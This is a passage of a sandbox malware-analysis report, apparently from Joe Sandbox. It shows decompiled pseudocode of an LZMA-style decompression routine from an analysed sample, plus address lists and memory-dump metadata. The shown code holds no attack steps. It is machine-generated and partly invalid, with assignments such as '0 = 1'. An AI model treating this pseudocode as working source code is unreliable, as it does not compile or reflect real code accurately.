                            											} else {
                            												L65:
                            												goto L58;
                            											}
                            										case 0x10:
                            											L109:
                            											__eflags =  *(__ebp - 0x6c);
                            											if( *(__ebp - 0x6c) == 0) {
                            												L165:
                            												 *(__ebp - 0x88) = 0x10;
                            												goto L170;
                            											}
                            											L110:
                            											__ecx =  *(__ebp - 0x70);
                            											__eax =  *(__ebp - 0xc);
                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                            											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                            											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                            											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                            											_t365 = __ebp - 0x70;
                            											 *_t365 =  *(__ebp - 0x70) + 1;
                            											__eflags =  *_t365;
                            											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                            											goto L111;
                            										case 0x11:
                            											L69:
                            											__esi =  *(__ebp - 0x58);
                            											 *(__ebp - 0x84) = 0x12;
                            											goto L132;
                            										case 0x12:
                            											L128:
                            											__eflags =  *(__ebp - 0x40);
                            											if( *(__ebp - 0x40) != 0) {
                            												L131:
                            												__eax =  *(__ebp - 0x58);
                            												 *(__ebp - 0x84) = 0x13;
                            												__esi =  *(__ebp - 0x58) + 2;
                            												L132:
                            												 *(_t644 - 0x54) = _t642;
                            												goto L133;
                            											}
                            											L129:
                            											__eax =  *(__ebp - 0x4c);
                            											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                            											__ecx =  *(__ebp - 0x58);
                            											__eax =  *(__ebp - 0x4c) << 4;
                            											__eflags = __eax;
                            											__eax =  *(__ebp - 0x58) + __eax + 4;
                            											goto L130;
                            										case 0x13:
                            											L141:
                            											__eflags =  *(__ebp - 0x40);
                            											if( *(__ebp - 0x40) != 0) {
                            												L143:
                            												_t469 = __ebp - 0x58;
                            												 *_t469 =  *(__ebp - 0x58) + 0x204;
                            												__eflags =  *_t469;
                            												 *(__ebp - 0x30) = 0x10;
                            												 *(__ebp - 0x40) = 8;
                            												L144:
                            												 *((intOrPtr*)(__ebp - 0x7c)) = 0x14;
                            												L145:
                            												 *(_t644 - 0x50) = 1;
                            												 *(_t644 - 0x48) =  *(_t644 - 0x40);
                            												goto L149;
                            											}
                            											L142:
                            											__eax =  *(__ebp - 0x4c);
                            											__ecx =  *(__ebp - 0x58);
                            											__eax =  *(__ebp - 0x4c) << 4;
                            											 *(__ebp - 0x30) = 8;
                            											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                            											L130:
                            											 *(__ebp - 0x58) = __eax;
                            											 *(__ebp - 0x40) = 3;
                            											goto L144;
                            										case 0x14:
                            											L156:
                            											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                            											__eax =  *(__ebp - 0x80);
                            											while(1) {
                            												L140:
                            												 *(_t644 - 0x88) = _t537;
                            												goto L1;
                            											}
                            										case 0x15:
                            											L91:
                            											__eax = 0;
                            											__eflags =  *(__ebp - 0x38) - 7;
                            											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                            											__al = __al & 0x000000fd;
                            											__eax = (__eflags >= 0) - 1 + 0xb;
                            											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                            											goto L120;
                            										case 0x16:
                            											goto L0;
                            										case 0x17:
                            											while(1) {
                            												L145:
                            												 *(_t644 - 0x50) = 1;
                            												 *(_t644 - 0x48) =  *(_t644 - 0x40);
                            												goto L149;
                            											}
                            										case 0x18:
                            											goto L146;
                            										case 0x19:
                            											L94:
                            											__eflags = __ebx - 4;
                            											if(__ebx < 4) {
                            												L98:
                            												 *(__ebp - 0x2c) = __ebx;
                            												L119:
                            												_t393 = __ebp - 0x2c;
                            												 *_t393 =  *(__ebp - 0x2c) + 1;
                            												__eflags =  *_t393;
                            												L120:
                            												__eax =  *(__ebp - 0x2c);
                            												__eflags = __eax;
                            												if(__eax == 0) {
                            													L166:
                            													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                            													goto L170;
                            												}
                            												L121:
                            												__eflags = __eax -  *(__ebp - 0x60);
                            												if(__eax >  *(__ebp - 0x60)) {
                            													goto L171;
                            												}
                            												L122:
                            												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                            												__eax =  *(__ebp - 0x30);
                            												_t400 = __ebp - 0x60;
                            												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                            												__eflags =  *_t400;
                            												goto L123;
                            											}
                            											L95:
                            											__ecx = __ebx;
                            											__eax = __ebx;
                            											__ecx = __ebx >> 1;
                            											__eax = __ebx & 0x00000001;
                            											__ecx = (__ebx >> 1) - 1;
                            											__al = __al | 0x00000002;
                            											__eax = (__ebx & 0x00000001) << __cl;
                            											__eflags = __ebx - 0xe;
                            											 *(__ebp - 0x2c) = __eax;
                            											if(__ebx >= 0xe) {
                            												L97:
                            												__ebx = 0;
                            												 *(__ebp - 0x48) = __ecx;
                            												L102:
                            												__eflags =  *(__ebp - 0x48);
                            												if( *(__ebp - 0x48) <= 0) {
                            													L107:
                            													__eax = __eax + __ebx;
                            													 *(__ebp - 0x40) = 4;
                            													 *(__ebp - 0x2c) = __eax;
                            													__eax =  *(__ebp - 4);
                            													__eax =  *(__ebp - 4) + 0x644;
                            													__eflags = __eax;
                            													L108:
                            													__ebx = 0;
                            													 *(__ebp - 0x58) = __eax;
                            													 *(__ebp - 0x50) = 1;
                            													 *(__ebp - 0x44) = 0;
                            													 *(__ebp - 0x48) = 0;
                            													L112:
                            													__eax =  *(__ebp - 0x40);
                            													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                            													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                            														L118:
                            														_t391 = __ebp - 0x2c;
                            														 *_t391 =  *(__ebp - 0x2c) + __ebx;
                            														__eflags =  *_t391;
                            														goto L119;
                            													}
                            													L113:
                            													__eax =  *(__ebp - 0x50);
                            													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                            													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                            													__eax =  *(__ebp - 0x58);
                            													__esi = __edi + __eax;
                            													 *(__ebp - 0x54) = __esi;
                            													__ax =  *__esi;
                            													__ecx = __ax & 0x0000ffff;
                            													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                            													__eflags =  *(__ebp - 0xc) - __edx;
                            													if( *(__ebp - 0xc) >= __edx) {
                            														__ecx = 0;
                            														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                            														__ecx = 1;
                            														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                            														__ebx = 1;
                            														__ecx =  *(__ebp - 0x48);
                            														__ebx = 1 << __cl;
                            														__ecx = 1 << __cl;
                            														__ebx =  *(__ebp - 0x44);
                            														__ebx =  *(__ebp - 0x44) | __ecx;
                            														__cx = __ax;
                            														__cx = __ax >> 5;
                            														__eax = __eax - __ecx;
                            														__edi = __edi + 1;
                            														__eflags = __edi;
                            														 *(__ebp - 0x44) = __ebx;
                            														 *__esi = __ax;
                            														 *(__ebp - 0x50) = __edi;
                            													} else {
                            														 *(__ebp - 0x10) = __edx;
                            														0x800 = 0x800 - __ecx;
                            														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                            														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                            														 *__esi = __dx;
                            													}
                            													__eflags =  *(__ebp - 0x10) - 0x1000000;
                            													if( *(__ebp - 0x10) >= 0x1000000) {
                            														L111:
                            														_t368 = __ebp - 0x48;
                            														 *_t368 =  *(__ebp - 0x48) + 1;
                            														__eflags =  *_t368;
                            														goto L112;
                            													} else {
                            														L117:
                            														goto L109;
                            													}
                            												}
                            												L103:
                            												__ecx =  *(__ebp - 0xc);
                            												__ebx = __ebx + __ebx;
                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                            												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                            												 *(__ebp - 0x44) = __ebx;
                            												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                            													__ecx =  *(__ebp - 0x10);
                            													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                            													__ebx = __ebx | 0x00000001;
                            													__eflags = __ebx;
                            													 *(__ebp - 0x44) = __ebx;
                            												}
                            												__eflags =  *(__ebp - 0x10) - 0x1000000;
                            												if( *(__ebp - 0x10) >= 0x1000000) {
                            													L101:
                            													_t338 = __ebp - 0x48;
                            													 *_t338 =  *(__ebp - 0x48) - 1;
                            													__eflags =  *_t338;
                            													goto L102;
                            												} else {
                            													L106:
                            													goto L99;
                            												}
                            											}
                            											L96:
                            											__edx =  *(__ebp - 4);
                            											__eax = __eax - __ebx;
                            											 *(__ebp - 0x40) = __ecx;
                            											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                            											goto L108;
                            										case 0x1a:
                            											L56:
                            											__eflags =  *(__ebp - 0x64);
                            											if( *(__ebp - 0x64) == 0) {
                            												L162:
                            												 *(__ebp - 0x88) = 0x1a;
                            												goto L170;
                            											}
                            											L57:
                            											__ecx =  *(__ebp - 0x68);
                            											__al =  *(__ebp - 0x5c);
                            											__edx =  *(__ebp - 8);
                            											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                            											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                            											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                            											 *( *(__ebp - 0x68)) = __al;
                            											__ecx =  *(__ebp - 0x14);
                            											 *(__ecx +  *(__ebp - 8)) = __al;
                            											__eax = __ecx + 1;
                            											__edx = 0;
                            											_t192 = __eax %  *(__ebp - 0x74);
                            											__eax = __eax /  *(__ebp - 0x74);
                            											__edx = _t192;
                            											goto L80;
                            										case 0x1b:
                            											L76:
                            											__eflags =  *(__ebp - 0x64);
                            											if( *(__ebp - 0x64) == 0) {
                            												L163:
                            												 *(__ebp - 0x88) = 0x1b;
                            												goto L170;
                            											}
                            											L77:
                            											__eax =  *(__ebp - 0x14);
                            											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                            											__eflags = __eax -  *(__ebp - 0x74);
                            											if(__eax >=  *(__ebp - 0x74)) {
                            												__eax = __eax +  *(__ebp - 0x74);
                            												__eflags = __eax;
                            											}
                            											__edx =  *(__ebp - 8);
                            											__cl =  *(__eax + __edx);
                            											__eax =  *(__ebp - 0x14);
                            											 *(__ebp - 0x5c) = __cl;
                            											 *(__eax + __edx) = __cl;
                            											__eax = __eax + 1;
                            											__edx = 0;
                            											_t275 = __eax %  *(__ebp - 0x74);
                            											__eax = __eax /  *(__ebp - 0x74);
                            											__edx = _t275;
                            											__eax =  *(__ebp - 0x68);
                            											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                            											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                            											_t284 = __ebp - 0x64;
                            											 *_t284 =  *(__ebp - 0x64) - 1;
                            											__eflags =  *_t284;
                            											 *( *(__ebp - 0x68)) = __cl;
                            											L80:
                            											 *(__ebp - 0x14) = __edx;
                            											goto L81;
                            										case 0x1c:
                            											while(1) {
                            												L123:
                            												__eflags =  *(__ebp - 0x64);
                            												if( *(__ebp - 0x64) == 0) {
                            													break;
                            												}
                            												L124:
                            												__eax =  *(__ebp - 0x14);
                            												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                            												__eflags = __eax -  *(__ebp - 0x74);
                            												if(__eax >=  *(__ebp - 0x74)) {
                            													__eax = __eax +  *(__ebp - 0x74);
                            													__eflags = __eax;
                            												}
                            												__edx =  *(__ebp - 8);
                            												__cl =  *(__eax + __edx);
                            												__eax =  *(__ebp - 0x14);
                            												 *(__ebp - 0x5c) = __cl;
                            												 *(__eax + __edx) = __cl;
                            												__eax = __eax + 1;
                            												__edx = 0;
                            												_t414 = __eax %  *(__ebp - 0x74);
                            												__eax = __eax /  *(__ebp - 0x74);
                            												__edx = _t414;
                            												__eax =  *(__ebp - 0x68);
                            												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                            												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                            												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                            												__eflags =  *(__ebp - 0x30);
                            												 *( *(__ebp - 0x68)) = __cl;
                            												 *(__ebp - 0x14) = _t414;
                            												if( *(__ebp - 0x30) > 0) {
                            													continue;
                            												} else {
                            													L127:
                            													L81:
                            													 *(__ebp - 0x88) = 2;
                            													goto L1;
                            												}
                            											}
                            											L167:
                            											 *(__ebp - 0x88) = 0x1c;
                            											goto L170;
                            									}
                            								}
                            								L171:
                            								_t539 = _t538 | 0xffffffff;
                            								goto L172;
                            							}
                            						}
                            					}
                            				}
                            			}















                            0x00407244
                            0x00407247
                            0x0040724a
                            0x0040724a
                            0x0040724d
                            0x0040724d
                            0x00407250
                            0x00407257
                            0x0040722b
                            0x0040722b
                            0x0040722b
                            0x0040722b
                            0x00000000
                            0x00407259
                            0x00407259
                            0x00000000
                            0x00407259
                            0x00407257
                            0x004071dd
                            0x004071dd
                            0x004071e0
                            0x004071e2
                            0x004071e5
                            0x00000000
                            0x00000000
                            0x00406f44
                            0x00406f44
                            0x00406f48
                            0x0040758d
                            0x0040758d
                            0x00000000
                            0x0040758d
                            0x00406f4e
                            0x00406f4e
                            0x00406f51
                            0x00406f54
                            0x00406f57
                            0x00406f5a
                            0x00406f5d
                            0x00406f60
                            0x00406f62
                            0x00406f65
                            0x00406f68
                            0x00406f6b
                            0x00406f6d
                            0x00406f6d
                            0x00406f6d
                            0x00000000
                            0x00000000
                            0x004070cf
                            0x004070cf
                            0x004070d3
                            0x00407599
                            0x00407599
                            0x00000000
                            0x00407599
                            0x004070d9
                            0x004070d9
                            0x004070dc
                            0x004070df
                            0x004070e2
                            0x004070e4
                            0x004070e4
                            0x004070e4
                            0x004070e7
                            0x004070ea
                            0x004070ed
                            0x004070f0
                            0x004070f3
                            0x004070f6
                            0x004070f7
                            0x004070f9
                            0x004070f9
                            0x004070f9
                            0x004070fc
                            0x004070ff
                            0x00407102
                            0x00407105
                            0x00407105
                            0x00407105
                            0x00407108
                            0x0040710a
                            0x0040710a
                            0x00000000
                            0x00000000
                            0x0040734c
                            0x0040734c
                            0x0040734c
                            0x00407350
                            0x00000000
                            0x00000000
                            0x00407356
                            0x00407356
                            0x00407359
                            0x0040735c
                            0x0040735f
                            0x00407361
                            0x00407361
                            0x00407361
                            0x00407364
                            0x00407367
                            0x0040736a
                            0x0040736d
                            0x00407370
                            0x00407373
                            0x00407374
                            0x00407376
                            0x00407376
                            0x00407376
                            0x00407379
                            0x0040737c
                            0x0040737f
                            0x00407382
                            0x00407385
                            0x00407389
                            0x0040738b
                            0x0040738e
                            0x00000000
                            0x00407390
                            0x00407390
                            0x0040710d
                            0x0040710d
                            0x00000000
                            0x0040710d
                            0x0040738e
                            0x004075c3
                            0x004075c3
                            0x00000000
                            0x00000000
                            0x00406bf2
                            0x004075fa
                            0x004075fa
                            0x00000000
                            0x004075fa
                            0x00407447
                            0x004074c7
                            0x00407490

                            Memory Dump Source
                            • Source File: 00000000.00000002.322657168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.322651210.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322670175.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322773729.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_YSpCB8DEek.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 9f3cc98df1e3ecd253cf91825a4064c55af45d063240f038e3dc270cc3f81a7c
                            • Instruction ID: 10cc2cc0f2c892254e5285b7a8bac4c216a70fda8fb68dfa7c3680dd08f727d3
                            • Opcode Fuzzy Hash: 9f3cc98df1e3ecd253cf91825a4064c55af45d063240f038e3dc270cc3f81a7c
                            • Instruction Fuzzy Hash: 55A15571E04228DBDF28CFA8C8547ADBBB1FF44305F10842AD856BB281D778A986DF45
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 98%
                            			E00407395() {
                            				void _t533;
                            				signed int _t534;
                            				signed int _t535;
                            				signed int* _t605;
                            				void* _t612;
                            
                            				L0:
                            				while(1) {
                            					L0:
                            					if( *(_t612 - 0x40) != 0) {
                            						 *(_t612 - 0x84) = 0x13;
                            						_t605 =  *((intOrPtr*)(_t612 - 0x58)) + 2;
                            						goto L132;
                            					} else {
                            						__eax =  *(__ebp - 0x4c);
                            						 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                            						__ecx =  *(__ebp - 0x58);
                            						__eax =  *(__ebp - 0x4c) << 4;
                            						__eax =  *(__ebp - 0x58) + __eax + 4;
                            						L130:
                            						 *(__ebp - 0x58) = __eax;
                            						 *(__ebp - 0x40) = 3;
                            						L144:
                            						 *(__ebp - 0x7c) = 0x14;
                            						L145:
                            						__eax =  *(__ebp - 0x40);
                            						 *(__ebp - 0x50) = 1;
                            						 *(__ebp - 0x48) =  *(__ebp - 0x40);
                            						L149:
                            						if( *(__ebp - 0x48) <= 0) {
                            							__ecx =  *(__ebp - 0x40);
                            							__ebx =  *(__ebp - 0x50);
                            							0 = 1;
                            							__eax = 1 << __cl;
                            							__ebx =  *(__ebp - 0x50) - (1 << __cl);
                            							__eax =  *(__ebp - 0x7c);
                            							 *(__ebp - 0x44) = __ebx;
                            							while(1) {
                            								L140:
                            								 *(_t612 - 0x88) = _t533;
                            								while(1) {
                            									L1:
                            									_t534 =  *(_t612 - 0x88);
                            									if(_t534 > 0x1c) {
                            										break;
                            									}
                            									switch( *((intOrPtr*)(_t534 * 4 +  &M00407602))) {
                            										case 0:
                            											if( *(_t612 - 0x6c) == 0) {
                            												goto L170;
                            											}
                            											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                            											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
                            											_t534 =  *( *(_t612 - 0x70));
                            											if(_t534 > 0xe1) {
                            												goto L171;
                            											}
                            											_t538 = _t534 & 0x000000ff;
                            											_push(0x2d);
                            											asm("cdq");
                            											_pop(_t569);
                            											_push(9);
                            											_pop(_t570);
                            											_t608 = _t538 / _t569;
                            											_t540 = _t538 % _t569 & 0x000000ff;
                            											asm("cdq");
                            											_t603 = _t540 % _t570 & 0x000000ff;
                            											 *(_t612 - 0x3c) = _t603;
                            											 *(_t612 - 0x1c) = (1 << _t608) - 1;
                            											 *((intOrPtr*)(_t612 - 0x18)) = (1 << _t540 / _t570) - 1;
                            											_t611 = (0x300 << _t603 + _t608) + 0x736;
                            											if(0x600 ==  *((intOrPtr*)(_t612 - 0x78))) {
                            												L10:
                            												if(_t611 == 0) {
                            													L12:
                            													 *(_t612 - 0x48) =  *(_t612 - 0x48) & 0x00000000;
                            													 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
                            													goto L15;
                            												} else {
                            													goto L11;
                            												}
                            												do {
                            													L11:
                            													_t611 = _t611 - 1;
                            													 *((short*)( *(_t612 - 4) + _t611 * 2)) = 0x400;
                            												} while (_t611 != 0);
                            												goto L12;
                            											}
                            											if( *(_t612 - 4) != 0) {
                            												GlobalFree( *(_t612 - 4));
                            											}
                            											_t534 = GlobalAlloc(0x40, 0x600); // executed
                            											 *(_t612 - 4) = _t534;
                            											if(_t534 == 0) {
                            												goto L171;
                            											} else {
                            												 *((intOrPtr*)(_t612 - 0x78)) = 0x600;
                            												goto L10;
                            											}
                            										case 1:
                            											L13:
                            											__eflags =  *(_t612 - 0x6c);
                            											if( *(_t612 - 0x6c) == 0) {
                            												 *(_t612 - 0x88) = 1;
                            												goto L170;
                            											}
                            											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                            											 *(_t612 - 0x40) =  *(_t612 - 0x40) | ( *( *(_t612 - 0x70)) & 0x000000ff) <<  *(_t612 - 0x48) << 0x00000003;
                            											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
                            											_t45 = _t612 - 0x48;
                            											 *_t45 =  *(_t612 - 0x48) + 1;
                            											__eflags =  *_t45;
                            											L15:
                            											if( *(_t612 - 0x48) < 4) {
                            												goto L13;
                            											}
                            											_t546 =  *(_t612 - 0x40);
                            											if(_t546 ==  *(_t612 - 0x74)) {
                            												L20:
                            												 *(_t612 - 0x48) = 5;
                            												 *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) =  *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) & 0x00000000;
                            												goto L23;
                            											}
                            											 *(_t612 - 0x74) = _t546;
                            											if( *(_t612 - 8) != 0) {
                            												GlobalFree( *(_t612 - 8));
                            											}
                            											_t534 = GlobalAlloc(0x40,  *(_t612 - 0x40)); // executed
                            											 *(_t612 - 8) = _t534;
                            											if(_t534 == 0) {
                            												goto L171;
                            											} else {
                            												goto L20;
                            											}
                            										case 2:
                            											L24:
                            											_t553 =  *(_t612 - 0x60) &  *(_t612 - 0x1c);
                            											 *(_t612 - 0x84) = 6;
                            											 *(_t612 - 0x4c) = _t553;
                            											_t605 =  *(_t612 - 4) + (( *(_t612 - 0x38) << 4) + _t553) * 2;
                            											goto L132;
                            										case 3:
                            											L21:
                            											__eflags =  *(_t612 - 0x6c);
                            											if( *(_t612 - 0x6c) == 0) {
                            												 *(_t612 - 0x88) = 3;
                            												goto L170;
                            											}
                            											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                            											_t67 = _t612 - 0x70;
                            											 *_t67 =  &(( *(_t612 - 0x70))[1]);
                            											__eflags =  *_t67;
                            											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
                            											L23:
                            											 *(_t612 - 0x48) =  *(_t612 - 0x48) - 1;
                            											if( *(_t612 - 0x48) != 0) {
                            												goto L21;
                            											}
                            											goto L24;
                            										case 4:
                            											L133:
                            											_t531 =  *_t605;
                            											_t588 = _t531 & 0x0000ffff;
                            											_t564 = ( *(_t612 - 0x10) >> 0xb) * _t588;
                            											if( *(_t612 - 0xc) >= _t564) {
                            												 *(_t612 - 0x10) =  *(_t612 - 0x10) - _t564;
                            												 *(_t612 - 0xc) =  *(_t612 - 0xc) - _t564;
                            												 *(_t612 - 0x40) = 1;
                            												_t532 = _t531 - (_t531 >> 5);
                            												__eflags = _t532;
                            												 *_t605 = _t532;
                            											} else {
                            												 *(_t612 - 0x10) = _t564;
                            												 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
                            												 *_t605 = (0x800 - _t588 >> 5) + _t531;
                            											}
                            											if( *(_t612 - 0x10) >= 0x1000000) {
                            												goto L139;
                            											} else {
                            												goto L137;
                            											}
                            										case 5:
                            											L137:
                            											if( *(_t612 - 0x6c) == 0) {
                            												 *(_t612 - 0x88) = 5;
                            												goto L170;
                            											}
                            											 *(_t612 - 0x10) =  *(_t612 - 0x10) << 8;
                            											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                            											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
                            											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
                            											L139:
                            											_t533 =  *(_t612 - 0x84);
                            											goto L140;
                            										case 6:
                            											__edx = 0;
                            											__eflags =  *(__ebp - 0x40);
                            											if( *(__ebp - 0x40) != 0) {
                            												__eax =  *(__ebp - 4);
                            												__ecx =  *(__ebp - 0x38);
                            												 *(__ebp - 0x34) = 1;
                            												 *(__ebp - 0x84) = 7;
                            												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                            												goto L132;
                            											}
                            											__eax =  *(__ebp - 0x5c) & 0x000000ff;
                            											__esi =  *(__ebp - 0x60);
                            											__cl = 8;
                            											__cl = 8 -  *(__ebp - 0x3c);
                            											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                            											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                            											__ecx =  *(__ebp - 0x3c);
                            											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                            											__ecx =  *(__ebp - 4);
                            											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                            											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                            											__eflags =  *(__ebp - 0x38) - 4;
                            											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                            											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                            											if( *(__ebp - 0x38) >= 4) {
                            												__eflags =  *(__ebp - 0x38) - 0xa;
                            												if( *(__ebp - 0x38) >= 0xa) {
                            													_t98 = __ebp - 0x38;
                            													 *_t98 =  *(__ebp - 0x38) - 6;
                            													__eflags =  *_t98;
                            												} else {
                            													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                            												}
                            											} else {
                            												 *(__ebp - 0x38) = 0;
                            											}
                            											__eflags =  *(__ebp - 0x34) - __edx;
                            											if( *(__ebp - 0x34) == __edx) {
                            												__ebx = 0;
                            												__ebx = 1;
                            												goto L61;
                            											} else {
                            												__eax =  *(__ebp - 0x14);
                            												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                            												__eflags = __eax -  *(__ebp - 0x74);
                            												if(__eax >=  *(__ebp - 0x74)) {
                            													__eax = __eax +  *(__ebp - 0x74);
                            													__eflags = __eax;
                            												}
                            												__ecx =  *(__ebp - 8);
                            												__ebx = 0;
                            												__ebx = 1;
                            												__al =  *((intOrPtr*)(__eax + __ecx));
                            												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                            												goto L41;
                            											}
                            										case 7:
                            											__eflags =  *(__ebp - 0x40) - 1;
                            											if( *(__ebp - 0x40) != 1) {
                            												__eax =  *(__ebp - 0x24);
                            												 *(__ebp - 0x80) = 0x16;
                            												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                            												__eax =  *(__ebp - 0x28);
                            												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                            												__eax =  *(__ebp - 0x2c);
                            												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                            												__eax = 0;
                            												__eflags =  *(__ebp - 0x38) - 7;
                            												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                            												__al = __al & 0x000000fd;
                            												__eax = (__eflags >= 0) - 1 + 0xa;
                            												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                            												__eax =  *(__ebp - 4);
                            												__eax =  *(__ebp - 4) + 0x664;
                            												__eflags = __eax;
                            												 *(__ebp - 0x58) = __eax;
                            												goto L69;
                            											}
                            											__eax =  *(__ebp - 4);
                            											__ecx =  *(__ebp - 0x38);
                            											 *(__ebp - 0x84) = 8;
                            											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                            											goto L132;
                            										case 8:
                            											__eflags =  *(__ebp - 0x40);
                            											if( *(__ebp - 0x40) != 0) {
                            												__eax =  *(__ebp - 4);
                            												__ecx =  *(__ebp - 0x38);
                            												 *(__ebp - 0x84) = 0xa;
                            												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                            											} else {
                            												__eax =  *(__ebp - 0x38);
                            												__ecx =  *(__ebp - 4);
                            												__eax =  *(__ebp - 0x38) + 0xf;
                            												 *(__ebp - 0x84) = 9;
                            												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                            												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                            											}
                            											goto L132;
                            										case 9:
                            											__eflags =  *(__ebp - 0x40);
